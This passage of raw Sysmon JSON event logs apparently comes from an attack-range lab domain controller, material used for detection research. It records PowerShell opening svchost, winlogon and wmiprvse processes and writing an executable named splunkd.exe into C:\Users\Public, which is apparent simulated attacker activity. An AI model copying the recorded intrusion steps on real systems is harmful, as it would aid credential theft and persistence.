bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010A6F30000}\r\nTargetProcessId: 1612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010A6F30000}","TargetProcessId":"1612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C8050100}\r\nTargetProcessId: 1844\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C8050100}","TargetProcessId":"1844","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:11.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nSourceProcessId: 2112\r\nSourceThreadId: 2792\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:11.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010923B0100}","SourceProcessId":"2112","SourceThreadId":"2792","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFD165B3F41)","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:53:11.987\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\splunkd.exe\r\nCreationUtcTime: 2020-08-01 07:52:09.670","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:53:11.987","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010923B0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\splunkd.exe","CreationUtcTime":"2020-08-01 07:52:09.670","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.299\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.299","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.d